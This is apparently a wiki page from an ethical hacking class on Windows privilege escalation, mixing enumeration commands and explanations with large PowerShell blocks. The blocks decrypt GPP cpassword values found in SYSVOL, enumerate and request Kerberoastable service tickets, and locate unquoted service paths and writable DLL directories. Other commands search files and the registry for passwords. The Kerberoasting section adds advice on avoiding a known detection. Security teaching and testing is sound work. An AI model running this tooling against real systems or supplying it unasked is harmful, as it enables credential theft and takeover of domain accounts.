Privilege Escalation - cloudsecuritylabs/ethicalhackingclass GitHub Wiki

Privilege escalation

  • bypass authentication
  • exploit authentication

Systeminfo

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

HOTFIX

wmic qfe

(Lists installed updates by KB number; compare them with the OS version/build from systeminfo to spot missing patches. WMIC is deprecated and no longer installed on recent Windows builds; Get-HotFix in PowerShell returns the same data.)

Drive Enumeration

wmic logicaldisk get caption

Process enumeration

tasklist 

User and Group Enumeration

whoami
whoami /groups
net user
net user Administrator
net localgroup administrators
(who are the local admins? Note that # is not a comment character in cmd, so a trailing comment must not be appended to the command.)

Network enumeration

ipconfig /all
route print
netstat -ano

Password Enumeration

Goal: Find passwords that are

  • Locally stored
  • stored in windows registry
  • SAM database
findstr /si password *.doc *.txt *.ini *.config
dir /s *pass* == *cred* == *ssh* == *.config*
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions\kali"

Firewall / antivirus enumeration

sc query windefend              (is Windows Defender running?)
sc queryex type= service        (all services, including third-party AV/EDR agents; sc needs the space after type=)
netsh firewall show state       (legacy firewall context, deprecated since Windows 7; current versions use netsh advfirewall show allprofiles)

Protection ring

  • Ring 0 - kernel mode: the kernel and device drivers, with full access to memory and hardware
  • Ring 1 / Ring 2 - defined by x86 but not used by Windows
  • Ring 3 - user mode: applications and services; a kernel exploit or a malicious driver is a jump from ring 3 to ring 0

Attack type

  • Horizontal -> take over another account at the same privilege level (e.g. another standard user), usually to reach that user's data or sessions
  • Vertical -> gain higher privileges: Administrator / SYSTEM on Windows, root on Linux

Windows

Windows has a user-centred design (UCD): every process runs in the security context of a user account, and that account's access token decides what the process may do.

Windows Authentication

  • Windows authentication is handled by the Windows Logon (Winlogon) process together with the Local Security Authority (LSASS) and the Security Account Manager (SAM)
  • SAM is the local database that stores local user accounts and their password hashes (NT hashes; LM hashes are no longer stored by default)
  • On disk: C:\Windows\System32\config\SAM
  • Via registry: HKEY_LOCAL_MACHINE\SAM
  • The SAM hive is locked by the kernel while Windows is running, so it can't be copied directly; it can be read offline (boot media), from a volume shadow copy, or by an administrator with reg save HKLM\SAM
  • The hashes are encrypted with a key derived from the SYSTEM hive (the boot key / SYSKEY), so a SAM copy is useless without SYSTEM
  • Modern Windows versions use NTLMv2 (NT LAN Manager); LM and NTLMv1 are disabled by default. In a domain, Kerberos is the default and NTLM is the fallback

Authentication method

  • NTLM
  • Kerberos

User Identification

Enumerate SIDs

Every account is identified by a security identifier (SID). The last component, the relative identifier (RID), is fixed for the built-in accounts: 500 = Administrator (even when renamed), 501 = Guest, 503 = DefaultAccount, 504 = WDAGUtilityAccount; accounts created later get RIDs from 1000 upwards.

wmic useraccount get name,sid
C:\Users\student>wmic useraccount get name,sid
Name                SID
Administrator       S-1-5-21-4220604249-1900369337-2551126576-500
DefaultAccount      S-1-5-21-4220604249-1900369337-2551126576-503
Guest               S-1-5-21-4220604249-1900369337-2551126576-501
student             S-1-5-21-4220604249-1900369337-2551126576-1001
WDAGUtilityAccount  S-1-5-21-4220604249-1900369337-2551126576-504

Access Token

  • An object that describes the security context of a process or thread on a system
  • Created by the Local Security Authority (LSASS) when Winlogon authenticates the user
  • Contains the identity and the privileges of the user
  • Winlogon starts userinit.exe with the token; every child process (explorer.exe and everything launched from it) inherits a copy of it
An access token contains:
    User SID, group SIDs, logon SID
    Privileges assigned to the user or the user's groups
    Default discretionary access control list (DACL) applied to objects the process creates
    Integrity level (with UAC, an administrator's normal shell gets a filtered medium-integrity token and the elevated shell gets the full one, which is why the two outputs below differ)

To list the privileges held in the current token:

whoami /priv from a normal and from an elevated (administrator) prompt. "Disabled" only means the privilege is not currently enabled in the token; a process that holds it can enable it with AdjustTokenPrivileges, so a disabled SeDebugPrivilege or SeBackupPrivilege is still usable.

C:\Users\student>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled
C:\WINDOWS\system32>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                  Description                               State
=============================== ========================================= ========
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Disabled
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Disabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Disabled
SeCreatePagefilePrivilege       Create a pagefile                         Disabled
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Disabled
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeRemoteShutdownPrivilege       Force shutdown from a remote system       Disabled
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege         Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege   Increase a process working set            Disabled
SeTimeZonePrivilege             Change the time zone                      Disabled
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Disabled
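As an added example (not code from the original wiki), the PowerShell function below parses whoami /priv output and flags the privileges that are most often abusable for escalation. The privilege-to-abuse mapping is my own summary of common tradecraft, and the sample input is constructed from a few rows of the elevated-prompt output above.

```powershell
# Added example: triage `whoami /priv` output for abusable privileges.
# The mapping is this example's own summary of well-known escalation paths,
# not something the original page defines.
$AbusablePrivilege = @{
    'SeImpersonatePrivilege'        = 'impersonate a SYSTEM token (Potato family)'
    'SeAssignPrimaryTokenPrivilege' = 'start a process with a stolen primary token'
    'SeDebugPrivilege'              = 'open any process, e.g. dump LSASS or inject into a SYSTEM process'
    'SeBackupPrivilege'             = 'read any file regardless of ACL, e.g. copy the SAM and SYSTEM hives'
    'SeRestorePrivilege'            = 'write any file regardless of ACL, e.g. replace a service binary'
    'SeTakeOwnershipPrivilege'      = 'take ownership of any object, then grant yourself full control'
    'SeLoadDriverPrivilege'         = 'load a vulnerable or malicious kernel driver'
    'SeManageVolumePrivilege'       = 'raw volume access, bypassing file ACLs'
    'SeCreateTokenPrivilege'        = 'forge arbitrary access tokens'
    'SeTcbPrivilege'                = 'act as part of the operating system'
}

function Get-AbusablePrivilege {
    [CmdletBinding()]
    param(
        # Lines of `whoami /priv` output. Defaults to the live token of this shell.
        [string[]]$WhoamiOutput = (whoami /priv)
    )
    foreach ($line in $WhoamiOutput) {
        # Data rows: privilege name, free-text description, then Enabled/Disabled.
        if ($line -match '^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$') {
            $name = $Matches[1]
            if ($AbusablePrivilege.ContainsKey($name)) {
                [pscustomobject]@{
                    Privilege = $name
                    State     = $Matches[2]   # Disabled can still be enabled by the process
                    Abuse     = $AbusablePrivilege[$name]
                }
            }
        }
    }
}

# Constructed sample input: a few rows from the elevated-prompt output on this page.
$Sample = @'
Privilege Name                  Description                               State
=============================== ========================================= ========
SeDebugPrivilege                Debug programs                            Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled
SeBackupPrivilege               Back up files and directories             Disabled
'@ -split "`r?`n"

Get-AbusablePrivilege -WhoamiOutput $Sample | Format-Table -AutoSize
# Live check of the current shell's token:
# Get-AbusablePrivilege | Format-Table -AutoSize
```

On the sample it reports SeDebugPrivilege, SeImpersonatePrivilege and SeBackupPrivilege; SeChangeNotifyPrivilege is held by every token and is skipped. whoami localizes the State column on non-English systems, so the Enabled|Disabled alternation in the regex has to be adjusted there.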

Common Windows Vulnerabilities

  • Missing security patches
  • kernel exploits
  • service vulnerability
  • misconfigurations
  • weak / default credentials

cPassword - Group Policy Preferences (GPP) can embed an account password (local admin, scheduled task, service, mapped drive) in XML files such as Groups.xml under the domain's SYSVOL share, which every domain user can read

  • the password is stored as an AES-256 encrypted cpassword attribute in that XML, but Microsoft published the key in the MS-GPPREF specification, so it is effectively cleartext
  • MS14-025 (2014) removed the ability to set new GPP passwords; existing files are not cleaned up and still turn up on older domains
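As an added example, not code from the wiki: a PowerShell decryptor for the cpassword attribute, plus a scan of SYSVOL for preference files that carry one. The AES key is the one Microsoft published in MS-GPPREF section 2.2.1.1.4; the SYSVOL path built from $env:USERDNSDOMAIN and the list of file names are my assumptions about a typical domain.

```powershell
# Added example: decrypt GPP cpassword values and hunt for them in SYSVOL.

function ConvertFrom-Cpassword {
    param([Parameter(Mandatory)][string]$Cpassword)
    # GPP strips the base64 '=' padding; restore it before decoding
    # (a length of 1 mod 4 is not valid base64 and FromBase64String will throw).
    switch ($Cpassword.Length % 4) {
        2 { $Cpassword += '==' }
        3 { $Cpassword += '=' }
    }
    $cipher = [Convert]::FromBase64String($Cpassword)
    # AES-256-CBC key from MS-GPPREF 2.2.1.1.4 with an all-zero IV. Published, so not a secret.
    $key = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                    0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = 'CBC'
    $aes.Padding = 'PKCS7'
    $aes.Key     = $key
    $aes.IV      = New-Object byte[] 16
    $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length)
    # The plaintext is UTF-16LE, like everything Windows writes into these XML files.
    [System.Text.Encoding]::Unicode.GetString($plain)
}

function Find-GppPassword {
    param(
        # Assumed default: the SYSVOL of the domain the current user is logged on to.
        [string]$PolicyRoot = "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN\Policies"
    )
    # Preference files known to carry cpassword attributes.
    $names = 'Groups.xml','Services.xml','ScheduledTasks.xml','DataSources.xml','Drives.xml','Printers.xml'
    Get-ChildItem -Path $PolicyRoot -Recurse -Include $names -ErrorAction SilentlyContinue |
        ForEach-Object {
            $file = $_.FullName
            [xml]$doc = Get-Content -LiteralPath $file -Raw
            foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
                # The different preference types name the account attribute differently.
                $account = @($node.userName, $node.accountName, $node.runAs) |
                    Where-Object { $_ } | Select-Object -First 1
                [pscustomobject]@{
                    File     = $file
                    Account  = $account
                    Password = ConvertFrom-Cpassword -Cpassword $node.cpassword
                    Changed  = $node.ParentNode.changed   # when the preference was last edited
                }
            }
        }
}

# Usage (on a domain-joined host, as any domain user):
# Find-GppPassword | Format-Table -AutoSize
# One value copied out of a Groups.xml:
# ConvertFrom-Cpassword -Cpassword '<cpassword attribute value>'
```

The Changed timestamp is worth keeping: a preference edited before May 2014 almost certainly predates MS14-025, and a local administrator password set that long ago is often still valid on machines the GPO applied to.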

LDAP

  • A simple LDAP bind sends the username and password in cleartext unless the connection uses LDAPS or StartTLS; captured or relayed binds are a credential source
  • Passwords are also sometimes written into plain LDAP attributes (description, comment) that any domain user can read

Kerberoasting

  • Any domain user can request a service ticket (TGS) for any service principal name (SPN), without ever contacting the service itself
  • The ticket is encrypted with the key of the account that owns the SPN, so a ticket for an SPN owned by a user account (not a computer account) can be cracked offline to recover that account's password; RC4 (etype 23) tickets crack far faster than AES ones
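As an added example (mine, not the wiki's), the two PowerShell functions below do the two halves of the attack from an ordinary domain user's session: find user accounts that own an SPN via LDAP, then request a service ticket for one of them. The domain defaults to $env:USERDNSDOMAIN and the code assumes Windows PowerShell 5.1 on a domain-joined host, where System.DirectoryServices and System.IdentityModel are available.

```powershell
# Added example: enumerate Kerberoastable accounts and request their service tickets.

function Get-KerberoastableAccount {
    param([string]$Domain = $env:USERDNSDOMAIN)   # assumed: the current logon domain
    $root     = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$Domain")
    $searcher = New-Object System.DirectoryServices.DirectorySearcher($root)
    # samAccountType 805306368 = normal user accounts. Computer accounts are excluded on
    # purpose: their passwords are long random strings and will not crack. krbtgt owns an
    # SPN too, but its ticket is the TGT and not a Kerberoast target.
    $searcher.Filter   = '(&(samAccountType=805306368)(servicePrincipalName=*)(!(samAccountName=krbtgt)))'
    $searcher.PageSize = 500
    [void]$searcher.PropertiesToLoad.AddRange([string[]]('samaccountname','serviceprincipalname','pwdlastset','msds-supportedencryptiontypes'))
    foreach ($r in $searcher.FindAll()) {
        # msDS-SupportedEncryptionTypes bit 4 = RC4 allowed; unset (0) means the DC
        # falls back to RC4 for a user account's service tickets.
        $enc = 0
        if ($r.Properties['msds-supportedencryptiontypes'].Count) {
            $enc = [int]$r.Properties['msds-supportedencryptiontypes'][0]
        }
        [pscustomobject]@{
            SamAccountName = [string]$r.Properties['samaccountname'][0]
            SPNs           = @($r.Properties['serviceprincipalname'])
            PwdLastSet     = [datetime]::FromFileTime([int64]$r.Properties['pwdlastset'][0])
            AesOnly        = ($enc -ne 0) -and (($enc -band 4) -eq 0)
        }
    }
}

function Request-ServiceTicket {
    # Ask the KDC for a TGS for one SPN. The ticket is cached in this logon session
    # (visible with `klist`) and is encrypted with the service account's key; Rubeus or
    # mimikatz can export it from the cache into a hashcat/john format.
    param([Parameter(Mandatory)][string]$Spn)
    Add-Type -AssemblyName System.IdentityModel
    $token = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $Spn
    # GetRequest() triggers the TGS-REQ and returns the AP-REQ bytes (ticket + authenticator).
    [pscustomobject]@{ SPN = $Spn; ApReqBytes = $token.GetRequest().Length }
}

# Usage: one ticket per account, preferring accounts that still allow RC4.
# Get-KerberoastableAccount | Where-Object { -not $_.AesOnly } |
#     ForEach-Object { Request-ServiceTicket -Spn $_.SPNs[0] }
```

PwdLastSet is the triage field: a service account whose password was set years ago is the one most likely to fall to a wordlist. Each request writes a 4769 (service ticket requested) event on the DC, and a burst of 4769s with RC4 encryption from one user is a standard Kerberoasting detection, so request tickets selectively rather than for every SPN.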

LSASS - Local Security Authority Subsystem Service

  • Holds credential material (NT hashes, Kerberos tickets, sometimes cleartext passwords) for logged-on users in its memory; dumping it needs administrator rights / SeDebugPrivilege, and Credential Guard or LSA protection (RunAsPPL) blocks or hardens it

Unattended installation

  • Answer files left behind by unattended / sysprep installations (C:\Windows\Panther\Unattend.xml, C:\Windows\System32\Sysprep\sysprep.xml and similar) can contain the local administrator password, often only base64 encoded
  • PXE / network boot images (e.g. MDT or SCCM task sequences) can likewise embed the credentials used for the deployment

SAM database (Security Account Manager)

  • Local database of user accounts and their password hashes, for the local machine only (domain accounts live in NTDS.dit on the domain controllers); together with the SYSTEM hive the hashes can be extracted and cracked or used directly in pass-the-hash

DLL hijacking (Dynamic Link Library)

  • A program that loads a DLL by name rather than by full path searches a fixed order of directories (application directory, system directories, current directory, PATH); if an attacker can write to a directory searched before the real DLL, or the DLL is missing entirely, a malicious DLL with that name is loaded with the privileges of the program

Unquoted service paths

  • A service whose ImagePath is unquoted and contains spaces (e.g. C:\Program Files\My App\svc.exe) is resolved by trying C:\Program.exe, then C:\Program Files\My.exe, before the real binary; if one of those directories is writable, a planted executable runs as the service account the next time the service starts
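One PowerShell block, added here as an example (not the wiki's code), serves both the DLL hijacking and the unquoted service path notes: it enumerates unquoted service paths and the hijack candidates the Service Control Manager would try, lists DLLs loaded by inspectable processes from directories the current user can write to, and checks writability by actually creating a probe file rather than parsing ACLs. Function names and the probe approach are my own choices.

```powershell
# Added example: unquoted service paths and writable DLL directories.

$WritableCache = @{}
function Test-DirectoryWritable {
    # Probe by creating a file: reading ACLs misses inherited and deny rules.
    # This touches disk, so endpoint monitoring may record it.
    param([string]$Path)
    if (-not $Path) { return $false }
    if ($WritableCache.ContainsKey($Path)) { return $WritableCache[$Path] }
    $ok = $false
    if (Test-Path -LiteralPath $Path -PathType Container) {
        $probe = Join-Path $Path ([IO.Path]::GetRandomFileName())
        try {
            [IO.File]::WriteAllText($probe, '')
            Remove-Item -LiteralPath $probe -Force
            $ok = $true
        } catch { $ok = $false }
    }
    $WritableCache[$Path] = $ok
    return $ok
}

function Get-UnquotedServicePath {
    Get-CimInstance Win32_Service | Where-Object {
        $_.PathName -and $_.PathName -notmatch '^"' -and $_.PathName -match ' '
    } | ForEach-Object {
        $svc = $_
        # Drop the arguments: the executable is everything up to the first '.exe'.
        $exe = $svc.PathName -replace '(?i)^(.*?\.exe).*$', '$1'
        if ($exe -notmatch ' ') { return }   # spaces only in the arguments: not exploitable
        # CreateProcess tries each space-delimited prefix + '.exe' before the real binary.
        $parts = $exe.Split(' ')
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ') + '.exe'
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                StartMode = $svc.StartMode
                Hijack    = $candidate
                Writable  = Test-DirectoryWritable (Split-Path -Path $candidate -Parent)
            }
        }
    }
}

function Get-WritableModuleDirectory {
    # DLLs loaded by processes we can inspect whose directory we can write to: a DLL
    # planted or replaced there is loaded on the next start. The other hijack case, a DLL
    # that is missing entirely, needs Process Monitor and is not covered here.
    Get-Process | ForEach-Object {
        $p = $_
        try { $mods = $p.Modules } catch { return }   # other users' processes: access denied
        foreach ($m in $mods) {
            $dir = Split-Path -Path $m.FileName -Parent
            if (Test-DirectoryWritable $dir) {
                [pscustomobject]@{ Process = $p.ProcessName; Id = $p.Id; Module = $m.FileName }
            }
        }
    }
}

# Usage:
# Get-UnquotedServicePath | Where-Object Writable | Format-Table -AutoSize
# Get-WritableModuleDirectory | Sort-Object Module -Unique | Format-Table -AutoSize
```

A writable hijack path is only useful if the service runs as a privileged account (RunsAs LocalSystem or a service account) and you can make it restart: through sc start/stop if the service DACL allows it, or through a reboot, which needs SeShutdownPrivilege or patience. Services whose binary does not end in .exe are left unparsed and should be checked by hand.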

Kernel Exploits

  • Ring 0 - Kernel - core of an operating system; a bug there yields SYSTEM directly
  • The kernel runs in system memory and its jobs are:
  • Memory management
  • Device Management
  • I/O Management
  • Resource Management
  • Match the OS version and the installed hotfixes (systeminfo, wmic qfe) against public kernel exploits; a failed kernel exploit usually crashes the machine (BSOD), so test it on a VM with the same build first

Windows NT

  • NT is the kernel family underlying every modern version of Microsoft Windows
  • It has two modes: User Mode (ring 3) and Kernel Mode (ring 0)

NET Utility

https://en.wikiversity.org/wiki/Net_(command)/User https://steflan-security.com/windows-privilege-escalation-credential-harvesting/

SETHC utility

WMIC Command line

HIDE Username from windows login screen

Linux

  • Exploit SUDO
  • Exploit SUID
  • Insecure credentials